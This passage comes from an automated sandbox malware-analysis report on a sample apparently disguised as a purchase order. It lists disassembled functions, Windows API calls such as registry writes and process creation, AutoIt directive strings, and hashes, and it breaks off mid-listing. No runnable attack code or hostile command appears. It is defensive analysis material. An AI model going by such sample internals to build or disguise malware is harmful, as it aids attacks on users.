                          • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000003,00000000,00000000), ref: 00F8C960
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1657459667.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                          • Associated: 00000000.00000002.1657434324.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657517581.0000000000F9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657517581.0000000000FC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657569007.0000000000FCC000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657589937.0000000000FD4000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_f00000_PO_987654345678.jbxd
                          Similarity
                          • API ID: Value$Close$_wcslen$ConnectCreateRegistry
                          • String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
                          • API String ID: 9721498-966354055
                          • Opcode ID: f9ab10eb32fa78848a37952fb85c37eacab9e5c9b31c3862f9028a19cb6b1f6c
                          • Instruction ID: 2aaa5d1afabc0709e32e52f335305ed0d494ae9b44af4a9f0c712d9c1eeb0703
                          • Opcode Fuzzy Hash: f9ab10eb32fa78848a37952fb85c37eacab9e5c9b31c3862f9028a19cb6b1f6c
                          • Instruction Fuzzy Hash: 60127D356042019FD714EF14C891A6AB7E5FF88724F18889DF84A9B3A2DB35FC41EB91
                          Function 00F9091E Relevance: 30.1, APIs: 6, Strings: 11, Instructions: 372windowCOMMON
                          Download Yara Rule
                          APIs
                          • CharUpperBuffW.USER32(?,?), ref: 00F909C6
                          • _wcslen.LIBCMT ref: 00F90A01
                          • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00F90A54
                          • _wcslen.LIBCMT ref: 00F90A8A
                          • _wcslen.LIBCMT ref: 00F90B06
                          • _wcslen.LIBCMT ref: 00F90B81
                            • Part of subcall function 00F1F9F2: _wcslen.LIBCMT ref: 00F1F9FD
                            • Part of subcall function 00F62BE8: SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00F62BFA
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1657459667.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                          • Associated: 00000000.00000002.1657434324.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657517581.0000000000F9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657517581.0000000000FC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657569007.0000000000FCC000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657589937.0000000000FD4000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_f00000_PO_987654345678.jbxd
                          Similarity
                          • API ID: _wcslen$MessageSend$BuffCharUpper
                          • String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
                          • API String ID: 1103490817-4258414348
                          • Opcode ID: 0743662d000b3f7602070be81abba03cd8cde86570bac5b22070c65c0c0032a8
                          • Instruction ID: e9a9eb54b717f293eb98627092dcb79cec3160d148dbd953590940111db490a9
                          • Opcode Fuzzy Hash: 0743662d000b3f7602070be81abba03cd8cde86570bac5b22070c65c0c0032a8
                          • Instruction Fuzzy Hash: 57E1B0326083018FCB14EF24C85196AB7E1BF98324F14895DF8969B3A2DB35ED45EB81
                          Function 00F8C998 Relevance: 30.0, APIs: 7, Strings: 10, Instructions: 242COMMON
                          Download Yara Rule
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1657459667.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                          • Associated: 00000000.00000002.1657434324.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657517581.0000000000F9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657517581.0000000000FC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657569007.0000000000FCC000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657589937.0000000000FD4000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_f00000_PO_987654345678.jbxd
                          Similarity
                          • API ID: _wcslen$BuffCharUpper
                          • String ID: HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
                          • API String ID: 1256254125-909552448
                          • Opcode ID: 6fe8b67297eac3318aaf27ea4411318966379daaa15419ce9d65de7a0a181630
                          • Instruction ID: fc1bad4acceedbae3f0d3b1c36d029bb16c6e910aa18b609a1f427c3d92c3309
                          • Opcode Fuzzy Hash: 6fe8b67297eac3318aaf27ea4411318966379daaa15419ce9d65de7a0a181630
                          • Instruction Fuzzy Hash: 29711733A0056A8BCB14FE7CDD52AFB3391AFA1764B110129F86597285E639CD44B7F0
                          Function 00F9833C Relevance: 29.9, APIs: 14, Strings: 3, Instructions: 196windowlibraryCOMMON
                          Download Yara Rule
                          APIs
                          • _wcslen.LIBCMT ref: 00F9835A
                          • _wcslen.LIBCMT ref: 00F9836E
                          • _wcslen.LIBCMT ref: 00F98391
                          • _wcslen.LIBCMT ref: 00F983B4
                          • LoadImageW.USER32(00000000,?,00000001,?,?,00002010), ref: 00F983F2
                          • LoadLibraryExW.KERNEL32(?,00000000,00000032,?,?,00000001,?,?,?,00F9361A,?), ref: 00F9844E
                          • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 00F98487
                          • LoadImageW.USER32(00000000,?,00000001,?,?,00000000), ref: 00F984CA
                          • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 00F98501
                          • FreeLibrary.KERNEL32(?), ref: 00F9850D
                          • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 00F9851D
                          • DestroyIcon.USER32(?), ref: 00F9852C
                          • SendMessageW.USER32(?,00000170,00000000,00000000), ref: 00F98549
                          • SendMessageW.USER32(?,00000064,00000172,00000001), ref: 00F98555
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1657459667.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                          • Associated: 00000000.00000002.1657434324.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657517581.0000000000F9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657517581.0000000000FC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657569007.0000000000FCC000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657589937.0000000000FD4000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_f00000_PO_987654345678.jbxd
                          Similarity
                          • API ID: Load$Image_wcslen$IconLibraryMessageSend$DestroyExtractFree
                          • String ID: .dll$.exe$.icl
                          • API String ID: 799131459-1154884017
                          • Opcode ID: 270692f5f1342d2f1e16e320f2d797325958b08966dc5fad614a6dc657cd9ce7
                          • Instruction ID: 412036aaca64caea2f05823dfc788714c74d5642aa689e8012339064b5c7fda3
                          • Opcode Fuzzy Hash: 270692f5f1342d2f1e16e320f2d797325958b08966dc5fad614a6dc657cd9ce7
                          • Instruction Fuzzy Hash: E661CE72900219BAEF14DF64DC41FBE77A8BF09761F10460AF815D60D1DBB8A985EBA0
                          Function 00F07778 Relevance: 28.3, APIs: 1, Strings: 15, Instructions: 273COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1657459667.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                          • Associated: 00000000.00000002.1657434324.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657517581.0000000000F9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657517581.0000000000FC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657569007.0000000000FCC000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657589937.0000000000FD4000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_f00000_PO_987654345678.jbxd
                          Similarity
                          • API ID:
                          • String ID: "$#OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#pragma compile$#requireadmin$'$Bad directive syntax error$Cannot parse #include$Unterminated group of comments
                          • API String ID: 0-1645009161
                          • Opcode ID: 6344090b71fd516ee9f9d44b8de45e36799fd90139c6190716bbf2fc9bcbf2ac
                          • Instruction ID: 618232261f577594579a1b3a55d8f12b33e9467d9c1def3875152ecdfd0c6d37
                          • Opcode Fuzzy Hash: 6344090b71fd516ee9f9d44b8de45e36799fd90139c6190716bbf2fc9bcbf2ac
                          • Instruction Fuzzy Hash: 9481F371E04705BBDB20BF60DC42FAE7BA8AF54740F044065F905AA1D2EB78EA45F7A1
                          Function 00F73E79 Relevance: 28.2, APIs: 8, Strings: 8, Instructions: 205COMMON
                          Download Yara Rule
                          APIs
                          • CharLowerBuffW.USER32(?,?), ref: 00F73EF8
                          • _wcslen.LIBCMT ref: 00F73F03
                          • _wcslen.LIBCMT ref: 00F73F5A
                          • _wcslen.LIBCMT ref: 00F73F98
                          • GetDriveTypeW.KERNEL32(?), ref: 00F73FD6
                          • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00F7401E
                          • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00F74059
                          • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00F74087
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1657459667.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                          • Associated: 00000000.00000002.1657434324.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657517581.0000000000F9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657517581.0000000000FC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657569007.0000000000FCC000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657589937.0000000000FD4000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_f00000_PO_987654345678.jbxd
                          Similarity
                          • API ID: SendString_wcslen$BuffCharDriveLowerType
                          • String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
                          • API String ID: 1839972693-4113822522
                          • Opcode ID: 87608b38c123aff734919870c9db167fdf6f02ae801591f93e006406a3c0a01b
                          • Instruction ID: 9e845fb5f9852703dfe64ac44545fe2e21d4694413aa8a71adf989ceebb97e0e
                          • Opcode Fuzzy Hash: 87608b38c123aff734919870c9db167fdf6f02ae801591f93e006406a3c0a01b
                          • Instruction Fuzzy Hash: CA71D2729082129FC710EF24C88196AB7F4EF94764F40892EF599D3291EB34ED45FB92
                          Function 00F65A1B Relevance: 27.2, APIs: 18, Instructions: 198windowtimeCOMMON
                          Download Yara Rule
                          APIs
                          • LoadIconW.USER32(00000063), ref: 00F65A2E
                          • SendMessageW.USER32(?,00000080,00000000,00000000), ref: 00F65A40
                          • SetWindowTextW.USER32(?,?), ref: 00F65A57
                          • GetDlgItem.USER32(?,000003EA), ref: 00F65A6C
                          • SetWindowTextW.USER32(00000000,?), ref: 00F65A72
                          • GetDlgItem.USER32(?,000003E9), ref: 00F65A82
                          • SetWindowTextW.USER32(00000000,?), ref: 00F65A88
                          • SendDlgItemMessageW.USER32(?,000003E9,000000CC,?,00000000), ref: 00F65AA9
                          • SendDlgItemMessageW.USER32(?,000003E9,000000C5,00000000,00000000), ref: 00F65AC3
                          • GetWindowRect.USER32(?,?), ref: 00F65ACC
                          • _wcslen.LIBCMT ref: 00F65B33
                          • SetWindowTextW.USER32(?,?), ref: 00F65B6F
                          • GetDesktopWindow.USER32 ref: 00F65B75
                          • GetWindowRect.USER32(00000000), ref: 00F65B7C
                          • MoveWindow.USER32(?,?,00000080,00000000,?,00000000), ref: 00F65BD3
                          • GetClientRect.USER32(?,?), ref: 00F65BE0
                          • PostMessageW.USER32(?,00000005,00000000,?), ref: 00F65C05
                          • SetTimer.USER32(?,0000040A,00000000,00000000), ref: 00F65C2F
                          Memory Dump Source
                          • Source File: 00000000.00000002.1657459667.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                          • Associated: 00000000.00000002.1657434324.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657517581.0000000000F9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657517581.0000000000FC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657569007.0000000000FCC000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657589937.0000000000FD4000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_f00000_PO_987654345678.jbxd
                          Similarity
                          • API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer_wcslen
                          • String ID:
                          • API String ID: 895679908-0
                          • Opcode ID: 5f75acbd19c6ee72ffff2b4b8b847b1b4ba639eb74a12e428cbb543456add143
                          • Instruction ID: d5310d96eb7c16cf87c9ea9dd6b3a61b1febece79460f73aa4eec5cf98537147
                          • Opcode Fuzzy Hash: 5f75acbd19c6ee72ffff2b4b8b847b1b4ba639eb74a12e428cbb543456add143
                          • Instruction Fuzzy Hash: 40717A31900B09AFDB20DFA8CE85AAEBBF5FF48B14F104519E186B35A0D775E944EB50
                          Function 00F200C6 Relevance: 26.3, APIs: 10, Strings: 5, Instructions: 81COMMON
                          Download Yara Rule
                          APIs
                          • __scrt_initialize_thread_safe_statics_platform_specific.LIBCMT ref: 00F200C6
                            • Part of subcall function 00F200ED: InitializeCriticalSectionAndSpinCount.KERNEL32(00FD070C,00000FA0,1D8D2FCA,?,?,?,?,00F423B3,000000FF), ref: 00F2011C
                            • Part of subcall function 00F200ED: GetModuleHandleW.KERNEL32(api-ms-win-core-synch-l1-2-0.dll,?,?,?,?,00F423B3,000000FF), ref: 00F20127
                            • Part of subcall function 00F200ED: GetModuleHandleW.KERNEL32(kernel32.dll,?,?,?,?,00F423B3,000000FF), ref: 00F20138
                            • Part of subcall function 00F200ED: GetProcAddress.KERNEL32(00000000,InitializeConditionVariable), ref: 00F2014E
                            • Part of subcall function 00F200ED: GetProcAddress.KERNEL32(00000000,SleepConditionVariableCS), ref: 00F2015C
                            • Part of subcall function 00F200ED: GetProcAddress.KERNEL32(00000000,WakeAllConditionVariable), ref: 00F2016A
                            • Part of subcall function 00F200ED: __crt_fast_encode_pointer.LIBVCRUNTIME ref: 00F20195
                            • Part of subcall function 00F200ED: __crt_fast_encode_pointer.LIBVCRUNTIME ref: 00F201A0
                          • ___scrt_fastfail.LIBCMT ref: 00F200E7
                            • Part of subcall function 00F200A3: __onexit.LIBCMT ref: 00F200A9
                          Strings
                          • SleepConditionVariableCS, xrefs: 00F20154
                          • kernel32.dll, xrefs: 00F20133
                          • WakeAllConditionVariable, xrefs: 00F20162
                          • InitializeConditionVariable, xrefs: 00F20148
                          • api-ms-win-core-synch-l1-2-0.dll, xrefs: 00F20122
                          Memory Dump Source
                          • Source File: 00000000.00000002.1657459667.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                          • Associated: 00000000.00000002.1657434324.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657517581.0000000000F9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657517581.0000000000FC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657569007.0000000000FCC000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657589937.0000000000FD4000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_f00000_PO_987654345678.jbxd
                          Similarity
                          • API ID: AddressProc$HandleModule__crt_fast_encode_pointer$CountCriticalInitializeSectionSpin___scrt_fastfail__onexit__scrt_initialize_thread_safe_statics_platform_specific
                          • String ID: InitializeConditionVariable$SleepConditionVariableCS$WakeAllConditionVariable$api-ms-win-core-synch-l1-2-0.dll$kernel32.dll
                          • API String ID: 66158676-1714406822
                          • Opcode ID: 6b9910bbb04120fa17e7062ff36705db842980222b4027e0aa8bfee1ea395b51
                          • Instruction ID: 1e4e695fa3d425879b156c2881901cbbe13fb62f95a49e6ebe29dd867d4b3d85
                          • Opcode Fuzzy Hash: 6b9910bbb04120fa17e7062ff36705db842980222b4027e0aa8bfee1ea395b51
                          • Instruction Fuzzy Hash: E221F333A457256BEB106BB4BC06B6E37A4EB05B61F10013BF905EB292DF64D840BAD5
                          Function 00F630F7 Relevance: 24.9, APIs: 8, Strings: 6, Instructions: 400COMMON
                          Download Yara Rule
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1657459667.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                          • Associated: 00000000.00000002.1657434324.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657517581.0000000000F9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657517581.0000000000FC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657569007.0000000000FCC000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657589937.0000000000FD4000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_f00000_PO_987654345678.jbxd
                          Similarity
                          • API ID: _wcslen
                          • String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT
                          • API String ID: 176396367-1603158881
                          • Opcode ID: 77609b0bdf4948b6b76bf1861db070cdb1b20b21c8e26c745d6bf8d3896e53f8
                          • Instruction ID: 9add83ea85e06f951b325824fa72d96544b731cf24bbf8d5b2632999c95cf5a5
                          • Opcode Fuzzy Hash: 77609b0bdf4948b6b76bf1861db070cdb1b20b21c8e26c745d6bf8d3896e53f8
                          • Instruction Fuzzy Hash: 87E1A532E005269BCB18DFA4C852BEDFBB4BF54720F548119E456E7281DF70AE85B790
                          Function 00F744C0 Relevance: 24.8, APIs: 7, Strings: 7, Instructions: 309COMMON
                          Download Yara Rule
                          APIs
                          • CharLowerBuffW.USER32(00000000,00000000,00F9CC08), ref: 00F74527
                          • _wcslen.LIBCMT ref: 00F7453B
                          • _wcslen.LIBCMT ref: 00F74599
                          • _wcslen.LIBCMT ref: 00F745F4
                          • _wcslen.LIBCMT ref: 00F7463F
                          • _wcslen.LIBCMT ref: 00F746A7
                            • Part of subcall function 00F1F9F2: _wcslen.LIBCMT ref: 00F1F9FD
                          • GetDriveTypeW.KERNEL32(?,00FC6BF0,00000061), ref: 00F74743
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1657459667.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                          • Associated: 00000000.00000002.1657434324.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657517581.0000000000F9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657517581.0000000000FC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657569007.0000000000FCC000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657589937.0000000000FD4000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_f00000_PO_987654345678.jbxd
                          Similarity
                          • API ID: _wcslen$BuffCharDriveLowerType
                          • String ID: all$cdrom$fixed$network$ramdisk$removable$unknown
                          • API String ID: 2055661098-1000479233
                          • Opcode ID: 7451534deade88791bb2ccad1155fa466dc248cb599c9b5bb8e4d41e984e8566
                          • Instruction ID: d1fe1ef0ca833cef23481ac5f05ce0176d7f4044ad26b1dca17f427eaf510cb9
                          • Opcode Fuzzy Hash: 7451534deade88791bb2ccad1155fa466dc248cb599c9b5bb8e4d41e984e8566
                          • Instruction Fuzzy Hash: 7DB1E331A083029FC714DF28CC91A6AF7E5AF95720F54891EF49AC7291D734E845EB93
                          Function 00F8AFF9 Relevance: 24.4, APIs: 16, Instructions: 418processCOMMON
                          Download Yara Rule
                          APIs
                          • _wcslen.LIBCMT ref: 00F8B198
                          • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00F8B1B0
                          • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00F8B1D4
                          • _wcslen.LIBCMT ref: 00F8B200
                          • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 00F8B214
                          • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 00F8B236
                          • _wcslen.LIBCMT ref: 00F8B332
                            • Part of subcall function 00F705A7: GetStdHandle.KERNEL32(000000F6), ref: 00F705C6
                          • _wcslen.LIBCMT ref: 00F8B34B
                          • _wcslen.LIBCMT ref: 00F8B366
                          • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,?,?), ref: 00F8B3B6
                          • GetLastError.KERNEL32(00000000), ref: 00F8B407
                          • CloseHandle.KERNEL32(?), ref: 00F8B439
                          • CloseHandle.KERNEL32(00000000), ref: 00F8B44A
                          • CloseHandle.KERNEL32(00000000), ref: 00F8B45C
                          • CloseHandle.KERNEL32(00000000), ref: 00F8B46E
                          • CloseHandle.KERNEL32(?), ref: 00F8B4E3
                          Memory Dump Source
                          • Source File: 00000000.00000002.1657459667.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                          • Associated: 00000000.00000002.1657434324.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657517581.0000000000F9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657517581.0000000000FC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657569007.0000000000FCC000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657589937.0000000000FD4000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_f00000_PO_987654345678.jbxd
                          Similarity
                          • API ID: Handle$Close_wcslen$Directory$CurrentSystem$CreateErrorLastProcess
                          • String ID:
                          • API String ID: 2178637699-0
                          • Opcode ID: e44c8820737e74c5285f669ad59df1becf1c1cd23a304c7aaa7542760c9adee8
                          • Instruction ID: bfa7700d4d0aa9f5871b2cea000a856c5dac12a9eeab9435a4ecc921ad7a91cf
                          • Opcode Fuzzy Hash: e44c8820737e74c5285f669ad59df1becf1c1cd23a304c7aaa7542760c9adee8
                          • Instruction Fuzzy Hash: F4F1BF31908300DFC714EF24C891BAEBBE1AF85324F18855DF4999B2A2CB35EC45EB52
                          Function 00F0326F Relevance: 23.0, APIs: 12, Strings: 1, Instructions: 214windowCOMMON
                          Download Yara Rule
                          APIs
                          • GetMenuItemCount.USER32(00FD1990), ref: 00F42F8D
                          • GetMenuItemCount.USER32(00FD1990), ref: 00F4303D
                          • GetCursorPos.USER32(?), ref: 00F43081
                          • SetForegroundWindow.USER32(00000000), ref: 00F4308A
                          • TrackPopupMenuEx.USER32(00FD1990,00000000,?,00000000,00000000,00000000), ref: 00F4309D
                          • PostMessageW.USER32(00000000,00000000,00000000,00000000), ref: 00F430A9
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1657459667.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                          • Associated: 00000000.00000002.1657434324.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657517581.0000000000F9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657517581.0000000000FC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657569007.0000000000FCC000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657589937.0000000000FD4000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_f00000_PO_987654345678.jbxd
                          Similarity
                          • API ID: Menu$CountItem$CursorForegroundMessagePopupPostTrackWindow
                          • String ID: 0
                          • API String ID: 36266755-4108050209
                          • Opcode ID: a31ecf4cf365bbf2d726584677a1d19e5393c392cd85bd7ac4c39c6360990261
                          • Instruction ID: c16a3d549dfce86e973f90cdb5b4e2e7a0512e76eca4b6b45ae4e6de6fb03f0f
                          • Opcode Fuzzy Hash: a31ecf4cf365bbf2d726584677a1d19e5393c392cd85bd7ac4c39c6360990261
                          • Instruction Fuzzy Hash: B371F731A44205BFEB218F64CC49F9ABF68FF05334F604216F914AA1E0C7B1A954FB91
                          Function 00F96CD9 Relevance: 22.9, APIs: 11, Strings: 2, Instructions: 194windowCOMMON
                          Download Yara Rule
                          APIs
                          • DestroyWindow.USER32(?,?), ref: 00F96DEB
                            • Part of subcall function 00F06B57: _wcslen.LIBCMT ref: 00F06B6A
                          • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00000000,?), ref: 00F96E5F
                          • SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 00F96E81
                          • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00F96E94
                          • DestroyWindow.USER32(?), ref: 00F96EB5
                          • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00F00000,00000000), ref: 00F96EE4
                          • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00F96EFD
                          • GetDesktopWindow.USER32 ref: 00F96F16
                          • GetWindowRect.USER32(00000000), ref: 00F96F1D
                          • SendMessageW.USER32(00000000,00000418,00000000,?), ref: 00F96F35
                          • SendMessageW.USER32(00000000,00000421,?,00000000), ref: 00F96F4D
                            • Part of subcall function 00F19944: GetWindowLongW.USER32(?,000000EB), ref: 00F19952
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1657459667.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                          • Associated: 00000000.00000002.1657434324.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657517581.0000000000F9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657517581.0000000000FC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657569007.0000000000FCC000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657589937.0000000000FD4000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_f00000_PO_987654345678.jbxd
                          Similarity
                          • API ID: Window$MessageSend$CreateDestroy$DesktopLongRect_wcslen
                          • String ID: 0$tooltips_class32
                          • API String ID: 2429346358-3619404913
                          • Opcode ID: dcd364f7b3f794e794683fe6a9c04a75c6a3e65d0ca5c809027db90468ea1f5b
                          • Instruction ID: f5c5564eb306a610b7a9b037b6eb02d4f2c023662fc02faaaf85696cf7acd639
                          • Opcode Fuzzy Hash: dcd364f7b3f794e794683fe6a9c04a75c6a3e65d0ca5c809027db90468ea1f5b
                          • Instruction Fuzzy Hash: B5717570504244AFEB20DF28DC54BBABBE9FB89314F44041EF989C7261D771E906EB16
                          Function 00F9911E Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 181windowfileCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 00F19BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00F19BB2
                          • DragQueryPoint.SHELL32(?,?), ref: 00F99147
                            • Part of subcall function 00F97674: ClientToScreen.USER32(?,?), ref: 00F9769A
                            • Part of subcall function 00F97674: GetWindowRect.USER32(?,?), ref: 00F97710
                            • Part of subcall function 00F97674: PtInRect.USER32(?,?,00F98B89), ref: 00F97720
                          • SendMessageW.USER32(?,000000B0,?,?), ref: 00F991B0
                          • DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 00F991BB
                          • DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 00F991DE
